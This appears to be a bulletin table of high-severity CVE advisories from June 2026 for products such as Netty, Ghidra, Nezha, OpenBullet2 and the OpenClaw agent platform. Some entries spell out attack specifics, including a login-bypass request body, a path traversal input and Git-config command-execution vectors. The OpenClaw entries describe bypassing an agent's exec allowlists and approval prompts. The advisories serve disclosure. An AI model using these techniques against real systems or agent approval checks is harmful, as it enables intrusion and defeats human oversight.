| Microsoft--Windows 11 Version 24H2 | Protection mechanism failure in Windows Secure Boot allows an authorized attacker to bypass a security feature locally. | 2026-06-09 | 7.9 | CVE-2026-45654 |
| Microsoft--Windows 11 version 26H1 | Use after free in Windows DWM Core Library allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-44804 |
| Microsoft--Windows 11 version 26H1 | Use after free in Windows DWM Core Library allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-44807 |
| Microsoft--Windows 11 version 26H1 | Use after free in Windows DWM Core Library allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-44808 |
| Microsoft--Windows 11 version 26H1 | Use after free in Windows DWM Core Library allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-44811 |
| Microsoft--Windows 11 version 26H1 | Use after free in Windows DWM Core Library allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-44813 |
| Microsoft--Windows Narrator Braille | Untrusted search path in Windows Narrator Braille allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-48565 |
| Microsoft--Windows Server 2012 | Use after free in Windows Deployment Services allows an unauthorized attacker to execute code over a network. | 2026-06-09 | 8.1 | CVE-2026-42987 |
| Microsoft--Windows Server 2012 | Integer overflow or wraparound in Windows Kerberos allows an authorized attacker to execute code over an adjacent network. | 2026-06-09 | 7.1 | CVE-2026-47288 |
| Microsoft--Windows Server 2016 | Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network. | 2026-06-09 | 7.5 | CVE-2026-47654 |
| Microsoft--Windows Server 2022 | Stack-based buffer overflow in Active Directory Domain Services allows an authorized attacker to execute code over a network. | 2026-06-09 | 8.8 | CVE-2026-45648 |
| Missilesilo--KittyCatfish | KittyCatfish 2.2 plugin for WordPress contains an SQL injection vulnerability that allows unauthenticated attackers to read database contents by exploiting an unescaped GET parameter. Attackers can inject SQL code through the 'kc_ad' parameter in base.css.php or kittycatfish.php to extract sensitive database information using boolean-based blind or time-based blind techniques. | 2026-06-09 | 8.2 | CVE-2017-20246 |
| moby--moby | Moby is an open source container framework. In Docker Engine prior to version 29.5.1, Docker Daemon versions 28.5.2 and prior, and Moby Daemon prior to version 2.0.0-beta.14, a race condition during docker cp mount setup allows a malicious container to redirect a bind mount target to an arbitrary host path, potentially overwriting host files or causing denial of service. This issue has been patched in Docker Engine version 29.5.1 and Moby Daemon version 2.0.0-beta.14. | 2026-06-12 | 7.2 | CVE-2026-42306 |
| MongoDB--MongoDB | A use-after-free vulnerability exists in MongoDB Server's server-side JavaScript engine when converting BSON documents to JavaScript arrays. An authenticated user with read privileges who is able to run server-side JavaScript (for example, via $where or $function) can cause the server to access memory that has already been freed. This may result in disclosure of information from the mongod process memory or a denial of service through a server crash. | 2026-06-12 | 8.8 | CVE-2026-11933 |
| MongoDB--MongoDB Server | The $_internalApplyOplogUpdate aggregation pipeline stage can be used to execute a document diff containing a malformed binary diff to return memory out-of-bounds or crash the server. $_internalApplyOplogUpdate can be executed by any authenticated user with access to the aggregate command. | 2026-06-09 | 8.1 | CVE-2026-9753 |
| MongoDB--MongoDB Server | A vulnerability in MongoDB Server's BSON validation logic allows an unauthenticated user to crash the mongod process by sending a specially crafted message. The BSON validator's handling of certain nested binary data structures permits uncontrolled mutual recursion between validation functions, where each re-entry resets internal depth tracking. | 2026-06-09 | 7.5 | CVE-2026-9740 |
| MongoDB--MongoDB Server | When OIDC authentication is enabled in configuration, clients may set specific values in the "mechanism" parameter of the "authenticate" command that lead to server crash. The authenticate command is accessible to unauthenticated clients, leading to pre-auth denial-of-service in affected product configurations. | 2026-06-09 | 7.5 | CVE-2026-9742 |
| MOSK Information Technologies Ltd.--CBS Platform | Improper neutralization of special elements used in an SQL command ('SQL injection') vulnerability in MOSK Information Technologies Ltd. CBS Platform allows SQL Injection. This issue affects CBS Platform: through 09062026. NOTE: The vendor was contacted and it was learned that the product is not supported. | 2026-06-09 | 9.8 | CVE-2026-8025 |
| nationalsecurityagency--ghidra | Ghidra 11.0 before 12.1 contains a SQL injection vulnerability in the changePassword() method of PostgresFunctionDatabase that fails to escape double quotes in usernames interpolated into ALTER ROLE statements. Authenticated attackers can inject SQL commands via crafted username parameters in PasswordChange network messages to escalate to PostgreSQL superuser privileges and gain full database control. | 2026-06-10 | 8.8 | CVE-2026-49498 |
| nationalsecurityagency--ghidra | Ghidra before 12.1 contains an unsafe deserialization vulnerability in client-side Shared-Project RMI connection code that allows unauthenticated remote code execution. Attackers can craft a malicious project file with a ghidra:// URL that, when opened via File → Open Project, deserializes untrusted objects using a Jython 2.7.4 gadget chain to execute arbitrary commands. | 2026-06-10 | 8.8 | CVE-2026-52751 |
| nationalsecurityagency--ghidra | Ghidra before 12.1 contains an authentication bypass vulnerability in PKIAuthenticationModule.authenticate() that allows any user with a valid CA-signed certificate to impersonate other users by presenting their public certificate with a null signature. Attackers can escalate privileges, modify repository access controls, exfiltrate shared reverse engineering databases, and permanently compromise server integrity. | 2026-06-10 | 8.8 | CVE-2026-52754 |
| nationalsecurityagency--ghidra | Ghidra before 12.1 contains a SQL injection vulnerability in BSim filter types that concatenate user-supplied values directly into SQL queries without escaping or parameterization. Remote attackers can inject arbitrary SQL via the BSim network query protocol to read, modify, or delete data in the PostgreSQL database. | 2026-06-10 | 8.8 | CVE-2026-52758 |
| nationalsecurityagency--ghidra | Ghidra before 12.1 contains a command injection vulnerability in URL annotation handling on Windows where cmd.exe metacharacters are not properly escaped. Attackers can execute arbitrary commands under the Ghidra user's privileges by embedding malicious URLs in program comments that victims click. | 2026-06-10 | 7.8 | CVE-2026-52750 |
| nationalsecurityagency--ghidra | Ghidra before 12.0.2 contains a path traversal vulnerability in the extension installer that fails to validate ZIP entry names during extraction. Attackers can craft malicious extensions with traversal sequences like ../ in filenames to write arbitrary files outside the intended directory, enabling code execution. | 2026-06-10 | 7.8 | CVE-2026-52752 |
| nationalsecurityagency--ghidra | Ghidra before 12.0.4 contains a path traversal vulnerability in the theme import functionality that allows attackers to write files outside the intended theme directory. Attackers can craft malicious theme ZIP files with traversal sequences in filenames to execute arbitrary code or modify sensitive files like .bashrc or .ssh/authorized_keys. | 2026-06-10 | 7.8 | CVE-2026-52755 |
| Naxclow--Smart Doorbell X3 | Naxclow devices use a uniform request-signing scheme based on a hard-coded, platform-wide salt embedded in every firmware image. Once this salt is recovered from any device, an attacker can generate valid signatures for arbitrary device or account operations due to the absence of per-device keys, server-side nonce tracking, or replay protections. Combined with the system's use of plain HTTP for control-plane traffic, the construction enables broad request forgery and impersonation across the platform. | 2026-06-12 | 9.8 | CVE-2026-28742 |
| Naxclow--Smart Doorbell X3 | A flaw in Naxclow's platform's onboarding workflow allows an attacker to replay a confirm-then-bind sequence to silently reassign a device to an arbitrary account. Because the affected endpoints validate request signatures but do not confirm legitimate ownership, an attacker with any account can take over a device without user interaction while the device remains online and unaware. | 2026-06-12 | 8.8 | CVE-2026-42947 |
| Naxclow--Smart Doorbell X3 | Naxclow devices use a server-side, per-device relay credential that never rotates and is re-issued to the device on each boot. Because this credential remains valid indefinitely and cannot be reset or revoked by the legitimate owner, any party that obtains it through any exposure path can maintain persistent access to the device's relay channel. This enables long-term impersonation or interception, even after factory resets or re-onboarding. | 2026-06-12 | 8.1 | CVE-2026-50101 |
| Naxclow--Smart Doorbell X3 | The Naxclow platform API that returns device relay registration details exposes a persistent credential without verifying that the requester is the legitimate device or owner. An actor able to present a platform-valid request signature can retrieve credentials for arbitrary devices and register on the relay as that device, enabling interception and disruption of its communications. | 2026-06-12 | 7.5 | CVE-2026-50108 |
| Nefteprodukttekhnika LLC--BUK TS-G Gas Station Automation System | Nefteprodukttekhnika BUK TS-G Gas Station Automation System 2.9.1 through 2.10.2 on Linux contains an Improper Authentication vulnerability (CWE-287) in the system configuration module. The /php/ajax-login.php endpoint returns userid=1 (administrator) in response to any HTTP POST request that supplies arbitrary credentials (e.g., action=dologin&login=<any_value>&pwd=<any_value>), and subsequent privileged endpoints under /php/ajax-main.php and /modules/* do not validate a server-side session. A remote unauthenticated attacker can invoke any administrative action exposed by the configuration module, including reading and modifying user rules, fuel tank gauges, fuel dispensers, relays, cash registers, bank terminals, fuel cards, price and customer displays, cash collection, and pricing rules. | 2026-06-13 | 9.8 | CVE-2026-12183 |
| nesquena--hermes-webui | Hermes WebUI before version 0.51.358 contains an improper access control vulnerability that allows unauthenticated remote attackers to hijack initial setup by submitting the _set_password parameter to the settings API endpoint without any network origin restriction. Attackers on any reachable network can send a POST request to the settings endpoint during the first-run setup window to persist an arbitrary password hash, obtain a valid session cookie, and lock out the legitimate operator from their own instance. | 2026-06-11 | 9.4 | CVE-2026-49973 |
| nesquena--hermes-webui | Hermes WebUI before version 0.51.311 contains a remote code execution vulnerability that allows authenticated attackers to execute arbitrary commands by placing malicious executable Git configuration in a workspace repository's .git/config file. Attackers can exploit Git subprocess invocations in api/workspace_git.py through vectors such as core.fsmonitor during git status, protocol.ext.allow with ext:: remotes during git fetch, credential.helper, core.askPass, core.gitProxy, or inherited environment variables including GIT_SSH_COMMAND to achieve arbitrary command execution on the host running the application. | 2026-06-09 | 8.8 | CVE-2026-49959 |
| nesquena--hermes-webui | Hermes WebUI before version 0.51.296 contains a workspace boundary bypass vulnerability that allows authenticated attackers to circumvent blocked-root path checks by exploiting an early return in the SSH/remote terminal profile workspace resolution logic within _remote_terminal_workspace_candidate(). Attackers can configure a remote terminal working directory to a system directory such as /etc, causing the workspace resolution path to accept it as a trusted local workspace root before the _is_blocked_workspace_path() guard executes, enabling read access to local system files through workspace file-read helpers. | 2026-06-09 | 7.7 | CVE-2026-49957 |
| Netcad Software Inc.--E-mar | Improper neutralization of special elements used in an SQL command ('SQL injection') vulnerability in Netcad Software Inc. E-Ä°mar allows SQL Injection. This issue affects E-Ä°mar: from 2.10.1.0 before 3.0.2. | 2026-06-09 | 9.8 | CVE-2026-7486 |
| netty--netty | Netty is a network application framework for development of protocol servers and clients. In netty-handler prior to versions 4.1.135.Final and 4.2.15.Final, an attacker can bypass IPv6 subnet rules due to an incorrect masking operation in IpSubnetFilterRule.compareTo(). Valid public IP addresses can bypass the restrictions. Versions 4.1.135.Final and 4.2.15.Final patch the issue. | 2026-06-11 | 8.1 | CVE-2026-44249 |
| netty--netty | Netty is a network application framework for development of protocol servers and clients. Prior to versions 4.1.135.Final and 4.2.15.Final, Netty's DnsResolveContext fails to validate the origin (bailiwick) of CNAME records in DNS responses. Versions 4.1.135.Final and 4.2.15.Final patch the issue. | 2026-06-12 | 8.7 | CVE-2026-45674 |
| netty--netty | Netty is a network application framework for development of protocol servers and clients. Prior to versions 4.1.135.Final and 4.2.15.Final, Netty's `DnsResolveContext` insufficiently validates the bailiwick of NS records, enabling DNS Cache Poisoning. An attacker controlling an authoritative name server for a subdomain can poison the cache for parent domains (like `.co.uk`). In `io.netty.resolver.dns.DnsResolveContext.AuthoritativeNameServerList#add` method accepts any NS record from the AUTHORITY section as long as the record's name is a suffix of the questionName. Subsequently, the `handleWithAdditional` method caches the associated A records from the ADDITIONAL section directly into the `authoritativeDnsServerCache` under the parent domain's key. This bypasses standard bailiwick rules, where a server authoritative for a subdomain should not be trusted to provide authoritative records for its parent. The poisoned cache is then used for all future resolutions under the parent domain's key. Versions 4.1.135.Final and 4.2.15.Final patch the issue. | 2026-06-12 | 8.7 | CVE-2026-47691 |
| netty--netty | Netty is a network application framework for development of protocol servers and clients. In netty-codec-redis prior to versions 4.1.135.Final and 4.2.15.Final, an attacker can cause DoS by sending a crafted Redis payload with deeply nested arrays. This forces the server to allocate a massive number of state objects and collections, leading to memory exhaustion and an OutOfMemoryError. Versions 4.1.135.Final and 4.2.15.Final patch the issue. | 2026-06-11 | 7.5 | CVE-2026-44250 |
| netty--netty | Netty is a network application framework for development of protocol servers and clients. In netty-codec-redis prior to versions 4.1.135.Final and 4.2.15.Final, an attacker can cause DoS by sending crafted Redis payloads across multiple connections without `\r\n`. This exhausts the server's direct memory pool (OutOfDirectMemoryError), preventing legitimate connections from being processed. Versions 4.1.135.Final and 4.2.15.Final patch the issue. | 2026-06-11 | 7.5 | CVE-2026-44890 |
| netty--netty | Netty is a network application framework for development of protocol servers and clients. Prior to version 4.2.15.Final, the default configuration of the `Http3ConnectionHandler` in the Netty HTTP/3 codec lacks an enforced maximum header size limit. When a peer does not explicitly specify `HTTP3_SETTINGS_MAX_FIELD_SECTION_SIZE`, the implementation defaults to an unbounded limit. This insecure default configuration allows a malicious client or server to send an enormous number of headers, leading to a memory exhaustion Denial of Service via an `OutOfMemoryError`. Version 4.2.15.Final contains a patch. | 2026-06-12 | 7.5 | CVE-2026-44892 |
| netty--netty | Netty is a network application framework for development of protocol servers and clients. In netty-codec-haproxy prior to versions 4.1.135.Final and 4.2.15.Final, when decoding a PP2_TYPE_SSL TLV, HAProxyMessage.readNextTLV() first calls `header.retainedSlice(header.readerIndex(), length)` and only then reads the 1-byte client field and 4-byte verify field. If the attacker sets the TLV length below 5, the subsequent readByte/readInt throws IndexOutOfBoundsException. HAProxyMessageDecoder only catches HAProxyProtocolException around this call, so the IOOBE propagates and the retained slice on the pooled cumulation buffer is never released. Versions 4.1.135.Final and 4.2.15.Final patch the issue. | 2026-06-12 | 7.5 | CVE-2026-44893 |
| netty--netty | Netty is a network application framework for development of protocol servers and clients. NoQuicTokenHandler is the tokenHandler used when the application does not set one. Prior to version 4.2.15.Final, its writeToken() returns false (server will not send Retry - acceptable), but validateToken() unconditionally `return 0`. In QuicheQuicServerCodec.handlePacket(), a non-negative return from validateToken() is interpreted as 'token is valid, ODCID starts at offset 0', causing the server to call quiche_accept as if the client's address had been validated by a Retry round-trip. Per RFC 9000 §8.1, a validated address lifts the 3× anti-amplification send limit. Thus any attacker who includes ANY non-empty token bytes in an Initial packet - with a spoofed victim source IP - causes the Netty server to treat the victim as validated and reflect full-size handshake flights (certificates, etc.) toward it without the 3× cap. The correct 'no token handler' semantics would be to return -1 (invalid) so the normal un-validated path and amplification limit apply. Version 4.2.15.Final patches the issue. | 2026-06-12 | 7.5 | CVE-2026-44894 |
| netty--netty | Netty is a network application framework for development of protocol servers and clients. Prior to versions 4.1.135.Final and 4.2.15.Final, SslClientHelloHandler.decode() reads the 24-bit TLS handshake length and, when the ClientHello does not fit in the first record, eagerly allocates `ctx.alloc().buffer(handshakeLength)` (line 161). The guard at line 140 is `handshakeLength > maxClientHelloLength && maxClientHelloLength != 0`, and the commonly-used SniHandler/AbstractSniHandler constructors (SniHandler(Mapping), SniHandler(AsyncMapping), AbstractSniHandler()) pass maxClientHelloLength=0 and handshakeTimeoutMillis=0, so the length guard is disabled and no timeout is scheduled. A 16 MiB request exceeds the default pooled chunk size and becomes a huge/unpooled allocation performed immediately. The buffer is retained in the handler until the channel closes. Versions 4.1.135.Final and 4.2.15.Final patch the issue. | 2026-06-12 | 7.5 | CVE-2026-45416 |
| netty--netty | Netty is a network application framework for development of protocol servers and clients. In versions of netty-transport-sctp prior to 4.1.135.Final and 4.2.15.Final, for each non-complete SctpMessage fragment the handler does `fragments.put(streamId, Unpooled.wrappedBuffer(frag, byteBuf))`, wrapping the previous accumulator and the new slice into a *new* CompositeByteBuf every time. After N fragments the accumulator is an N-deep chain of composites, each holding references and component arrays; readableBytes()/getBytes() on the final buffer recurse N levels. There is no limit on N, on total bytes, or on the number of streamIdentifiers an attacker can open (each gets its own map entry). A peer that never sets the `complete` flag can grow this structure indefinitely from tiny 1-byte DATA chunks. Versions 4.1.135.Final and 4.2.15.Final patch the issue. | 2026-06-12 | 7.5 | CVE-2026-46340 |
| netty--netty | Netty is a network application framework for development of protocol servers and clients. Prior to version 4.2.15.Final, a memory exhaustion vulnerability in the Netty HTTP/3 codec allows the creation of an infinite number of blocked streams, which can cause OOM error. Version 4.2.15.Final patches the issue. | 2026-06-12 | 7.5 | CVE-2026-48748 |
| netty--netty | Netty is a network application framework for development of protocol servers and clients. Prior to versions 4.1.135.Final and 4.2.15.Final, SimpleTrustManagerFactory.engineGetTrustManagers() and related paths wrap any user-supplied plain X509TrustManager in X509TrustManagerWrapper, which extends X509ExtendedTrustManager but implements the 3-arg checkServerTrusted(chain, authType, SSLEngine) by discarding the SSLEngine and calling the 2-arg delegate. Because the object now IS an X509ExtendedTrustManager, neither SunJSSE's internal AbstractTrustManagerWrapper nor Netty's own OpenSslX509TrustManagerWrapper will re-wrap it to add endpoint-identification. Consequently, even though Netty 4.2 sets endpointIdentificationAlgorithm="HTTPS" by default, a client built with `SslContextBuilder.forClient().trustManager(somePlainX509TrustManager)` performs no hostname verification at all. Versions 4.1.135.Final and 4.2.15.Final patch the issue. | 2026-06-12 | 7.5 | CVE-2026-50010 |
| netty--netty | Netty is a network application framework for development of protocol servers and clients. Prior to versions 4.1.135.Final and 4.2.15.Final, RedisArrayAggregator pre-allocates ArrayList with initial capacity equal to the RESP array element count declared in an array header. That count is taken from the wire before the corresponding child messages exist. A small malicious header can claim a huge initial capacity. Versions 4.1.135.Final and 4.2.15.Final patch the issue. | 2026-06-12 | 7.5 | CVE-2026-50011 |
| nezhahq--nezha | Nezha Monitoring is a self-hostable, lightweight, servers and websites monitoring and O&M tool. From version 1.4.0 to before version 2.0.8, a RoleMember user can create a scheduled cron task with Cover=CronCoverAll, Servers=[] and an arbitrary Command. At every tick of the scheduler, the dashboard pushes that command to every server in the global ServerShared map - including servers that belong to other tenants (admin's servers, other members' servers). Each agent runs the command and returns the output, which is then sent to the attacker's own NotificationGroup → attacker-controlled webhook. This issue has been patched in version 2.0.8. | 2026-06-12 | 9.9 | CVE-2026-46716 |
| nezhahq--nezha | Nezha Monitoring is a self-hostable, lightweight, servers and websites monitoring and O&M tool. Prior to version 2.0.13, fallbackToFrontend in the dashboard's NoRoute handler treats any URL whose raw string starts with /dashboard as an admin-frontend asset request. The check uses strings.HasPrefix, not a path-segment match, so the input /dashboard../data/config.yaml is accepted; strings.TrimPrefix leaves ../data/config.yaml; and path.Join("admin-dist", "../data/config.yaml") normalizes to data/config.yaml - which os.Stat finds and http.ServeFile returns. No authentication required. This issue has been patched in version 2.0.13. | 2026-06-12 | 9.1 | CVE-2026-53519 |
| nezhahq--nezha | Nezha Monitoring is a self-hostable, lightweight, servers and websites monitoring and O&M tool. From version 1.4.0 to before version 2.0.8, nezha's dashboard supports two user roles: RoleAdmin (Role==0) and RoleMember (Role==1). The notification routes POST /api/v1/notification and PATCH /api/v1/notification/:id are wired through commonHandler rather than adminHandler - so a RoleMember user can call them. These handlers synchronously Send() an HTTP request to a user-controlled URL and reflect the entire response body (no size limit) back to the caller on any non-2xx response. This issue has been patched in version 2.0.8. | 2026-06-12 | 7.7 | CVE-2026-46717 |
| nezhahq--nezha | Nezha Monitoring is a self-hostable, lightweight, servers and websites monitoring and O&M tool. From version 1.4.0 to before version 2.0.8, a RoleMember can fire other users' cron tasks via AlertRule.FailTriggerTasks (no ownership check). This issue has been patched in version 2.0.8. | 2026-06-12 | 7.1 | CVE-2026-47120 |
| nezhahq--nezha | Nezha Monitoring is a self-hostable, lightweight, servers and websites monitoring and O&M tool. From version 0.20.0 to before version 2.0.12, authenticated agents can forge service-monitor results for other users' services. This issue has been patched in version 2.0.12. | 2026-06-12 | 7.1 | CVE-2026-48119 |
| nezhahq--nezha | Nezha Monitoring is a self-hostable, lightweight, servers and websites monitoring and O&M tool. From version 1.0.0 to before version 2.0.14, cross-site GET request can trigger stored cron commands on a victim's agents. This issue has been patched in version 2.0.14. | 2026-06-12 | 7.1 | CVE-2026-49396 |
| NginxProxyManager--nginx-proxy-manager | Nginx Proxy Manager versions 2.9.14 through 2.15.1, fixed in commit a5db5ed, contain an authenticated remote code execution vulnerability via OS command injection in the setupCertbotPlugins() function in backend/setup.js, allowing attackers with certificates:manage permission to execute arbitrary commands by storing a malicious payload in the dns_provider_credentials field. The user-controlled dns_provider_credentials value is interpolated directly into a shell command executed via child_process.exec() without sanitization or escaping, causing the injected command to execute upon backend restart. | 2026-06-08 | 7.5 | CVE-2026-40519 |
| nimiq--core-rs-albatross | Nimiq is a Rust implementation of the Nimiq Proof-of-Stake protocol based on the Albatross consensus algorithm. Prior to version 1.4.0, iIn handle_dht_get(), the DhtResults accumulator is only initialized when the first DHT record passes verification. If the first record fails (from a malicious DHT node), DhtResults is never created, and all subsequent valid records are discarded with "DHT inconsistent state" errors. This issue has been patched in version 1.4.0. | 2026-06-09 | 7.5 | CVE-2026-46541 |
| nimiq--core-rs-albatross | Nimiq is a Rust implementation of the Nimiq Proof-of-Stake protocol based on the Albatross consensus algorithm. Prior to version 1.5.0, a remote, unauthenticated denial-of-service vulnerability in MerkleRadixTrie::put_chunk allows any state-sync peer to crash any node performing state synchronization (freshly joining nodes and recovering nodes). This issue has been patched in version 1.5.0. | 2026-06-09 | 7.5 | CVE-2026-46545 |
| NVIDIA--DALI | NVIDIA DALI contains a vulnerability in a component where an attacker could cause a heap-based buffer overflow. A successful exploit of this vulnerability might lead to code execution, data tampering, denial of service, and information disclosure. | 2026-06-09 | 7.3 | CVE-2026-24180 |
| NVIDIA--DALI | NVIDIA DALI contains a vulnerability in a component where an attacker could cause an improper index validation. A successful exploit of this vulnerability might lead to code execution, data tampering, denial of service, and information disclosure. | 2026-06-09 | 7.3 | CVE-2026-24181 |
| Ollie Armstrong--Simply Poll | Simply Poll 1.4.1 plugin for WordPress contains an SQL injection vulnerability that allows unauthenticated attackers to extract database information by injecting SQL code through the 'pollid' POST parameter. Attackers can send requests to the admin-ajax.php endpoint with the 'spAjaxResults' action and malicious 'pollid' values to execute arbitrary SQL queries and read sensitive data from the WordPress database. | 2026-06-09 | 8.2 | CVE-2016-20062 |
| Omnissa--Omnissa Workspace ONE Assist for macOS | Omnissa Workspace ONE® Assist for macOS contains a Local Privilege Escalation Vulnerability. | 2026-06-09 | 7.8 | CVE-2026-22926 |
| open-metadata--OpenMetadata | OpenMetadata is a unified metadata platform. Prior to version 1.12.4, a non-admin SSO user can trigger a TEST_CONNECTION workflow for a Database Service and receive, in the HTTP 201 response of POST /api/v1/automations/workflows, both the cleartext database password in request.connection.config.password and the ingestion bot JWT in openMetadataServerConnection.securityConfig.jwtToken. The leaked ingestion-bot token can then be reused as Authorization: Bearer <jwt> to access sensitive service APIs with bot-level privileges. This issue has been patched in version 1.12.4. | 2026-06-08 | 8.3 | CVE-2026-46481 |
| openbullet--openbullet2 | OpenBullet2 through version 0.3.2 contains an authentication bypass vulnerability in the API key authentication middleware that allows unauthenticated attackers to gain admin access by supplying an empty X-Api-Key header value. Attackers can exploit the middleware's comparison of the supplied header against an empty AdminApiKey default string to access the admin console and all API endpoints without valid credentials. | 2026-06-08 | 9.8 | CVE-2026-25555 |
| openbullet--openbullet2 | OpenBullet2 through version 0.3.2 contains a path traversal vulnerability in the wordlist endpoint that allows authenticated attackers to perform arbitrary file read, write, and delete operations by supplying unsanitized absolute paths to the upload handler and wordlist functions. Attackers can chain the file write and delete primitives to achieve remote code execution by manipulating critical system files such as /etc/passwd, with full system impact since the application runs as root by default. | 2026-06-08 | 8.8 | CVE-2026-25559 |
| openbullet--openbullet2 | OpenBullet2 through version 0.3.2 contains a remote code execution vulnerability that allows authenticated users to execute arbitrary commands by uploading script files (.bat.ps1.sh) through the FileProxySource proxy loading feature. Attackers can upload malicious script files as proxy sources, causing the server to execute the scripts and return output as proxy lines, resulting in arbitrary command execution on the host as the process user. | 2026-06-08 | 8.8 | CVE-2026-25855 |
| openbullet--openbullet2 | OpenBullet2 through version 0.3.2 contains an authenticated remote code execution vulnerability that allows authenticated users to execute arbitrary C# code on the server host by creating or modifying job configurations. Attackers can leverage the plain C# execution mode, which lacks reference filtering or API restrictions, to access the file system, spawn processes, and invoke arbitrary .NET APIs as the process user. | 2026-06-08 | 8.8 | CVE-2026-25856 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.27 contains a state mutation vulnerability in node pairing reconnection that allows paired nodes to confuse approval scope decisions. Attackers can exploit reconnection logic to restore or present broader node authority than intended, potentially bypassing approval restrictions. | 2026-06-12 | 9.8 | CVE-2026-53838 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.12 contains a shell option parsing vulnerability that allows combined POSIX shell flags to bypass exec revalidation checks. Attackers can exploit this by using combined shell options to execute inline shell content without intended allowlist validation, potentially enabling unauthorized command execution when the affected feature is enabled. | 2026-06-11 | 8.8 | CVE-2026-53806 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.6 contains an authorization bypass vulnerability in Telegram interactive callbacks that allows authenticated users to skip commands.allowFrom validation. Attackers can invoke affected callbacks to mark themselves as authorized senders before allowlist checks are applied, triggering command behavior outside configured Telegram sender restrictions. | 2026-06-11 | 8.8 | CVE-2026-53807 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.18 contains a code execution vulnerability where marketplace runtime extension metadata can redirect loading toward unscanned package payloads. Attackers with trusted operator access can manipulate extension metadata to load plugin code outside reviewed package entry points, bypassing security scanning. | 2026-06-11 | 8.8 | CVE-2026-53810 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.7 contains a privilege escalation vulnerability in the Matrix allowFrom feature that allows authenticated accounts to match policy entries through mutable display name metadata. Attackers with the ability to change display names can receive agent access intended for another Matrix identity, potentially gaining unauthorized permissions depending on operator configuration. | 2026-06-11 | 8.8 | CVE-2026-53811 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.20 contains a privilege escalation vulnerability where hook-triggered agent runs incorrectly receive owner-scoped MCP loopback authority instead of hook-appropriate scope. Attackers with a valid hook token can exploit the /hooks/agent endpoint to cause spawned CLI runtimes to access or invoke owner-only MCP tools, potentially executing privileged actions like persistent cron state modifications. | 2026-06-11 | 8.3 | CVE-2026-53814 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.22 contains a locality validation vulnerability in Control UI pairing that allows attackers with network access to spoof locality information and obtain durable admin-capable device tokens. Attackers can exploit insufficient locality-derived trust validation to convert temporary shared access into persistent administrative credentials that survive token rotation. | 2026-06-11 | 8.8 | CVE-2026-53817 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.27 contains an arbitrary code execution vulnerability in skill install flows where workspace .env files can override the Homebrew executable selection. Attackers with access to trusted operator workspaces can execute unintended Homebrew-compatible executables during skill setup to compromise the system. | 2026-06-11 | 8.8 | CVE-2026-53819 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.18 accepts WebSocket client-declared operator scopes before binding to server-approved pairing or trusted-proxy authorization baseline. Unpaired or restricted trusted-proxy Control UI clients can obtain cached operator.admin authority on live WebSocket connections to execute admin-gated Gateway RPCs. | 2026-06-12 | 8.8 | CVE-2026-53821 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.18 contains a command injection vulnerability where shell wrapper argv could change between approval and execution. Attackers can rebuild command arguments after allowlist approval to execute unapproved command shapes, potentially bypassing security controls. | 2026-06-12 | 8.8 | CVE-2026-53822 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.3 contains a privilege escalation vulnerability in the allowFrom feature that binds to mutable Slack display names. Attackers with Slack account access can change display name metadata to match policy entries, potentially gaining unauthorized agent access intended for other identities. | 2026-06-12 | 8.1 | CVE-2026-53823 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.6 contains an authorization bypass vulnerability in native command handling that allows authenticated senders to execute owner-only commands without proper policy enforcement. Attackers can trigger native command handling to bypass the configured owner-command access control, potentially executing privileged commands from unauthorized users. | 2026-06-12 | 8.8 | CVE-2026-53828 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.18 contains an approval display truncation vulnerability allowing authenticated users to hide command suffixes from approvers. Attackers can submit oversized exec commands with benign prefixes and malicious suffixes to execute unauthorized operations after approval. | 2026-06-12 | 8 | CVE-2026-53829 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.18 contains a policy enforcement vulnerability in system.run safe-bin allowlist validation that allows shell expansion to modify command interpretation on POSIX nodes. Authenticated operators can exploit shell metacharacters in approved commands to read unintended node-local files and expose sensitive configuration data. | 2026-06-12 | 8.3 | CVE-2026-53831 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.12 contains an allowlist bypass vulnerability in PowerShell encoded-command handling that allows attackers to execute encoded commands using abbreviated flag aliases not recognized by the allowlist parser. Remote authenticated operators can bypass execution allowlist checks by using unrecognized encoded-command alias forms to execute arbitrary PowerShell content. | 2026-06-12 | 8.8 | CVE-2026-53836 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.18 contains a server-side request forgery vulnerability in browser control that allows authenticated users to bypass private-network navigation checks through Playwright act interactions. Attackers can trigger navigation to private-network targets via action-triggered redirects and subsequently read restricted page content using browser evaluation capabilities. | 2026-06-11 | 7.7 | CVE-2026-53812 |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.25 contains a path traversal vulnerability in memory-core artifact loading where workspace state influences local package root resolution. Attackers with access to affected workspaces can load memory-core artifacts from unintended local locations, potentially executing malicious code or accessing sensitive data. | 2026-06-11 | 7.8 | CVE-2026-53813 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.18 contains an insufficient provenance validation vulnerability in node event handling that allows paired nodes to forge exec lifecycle events without system.run authorization. A malicious or compromised paired node can send crafted node.event messages to the gateway, steering target sessions into exec-event paths that expose capabilities the reduced node surface should not provide. | 2026-06-11 | 7.2 | CVE-2026-53816 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.18 contains an identity header validation vulnerability allowing local same-host callers to forge trusted-proxy identity headers. Attackers with access to the proxy-facing Gateway port can supply forged identity headers to assume operator identity and potentially escalate privileges. | 2026-06-12 | 7.7 | CVE-2026-53832 |
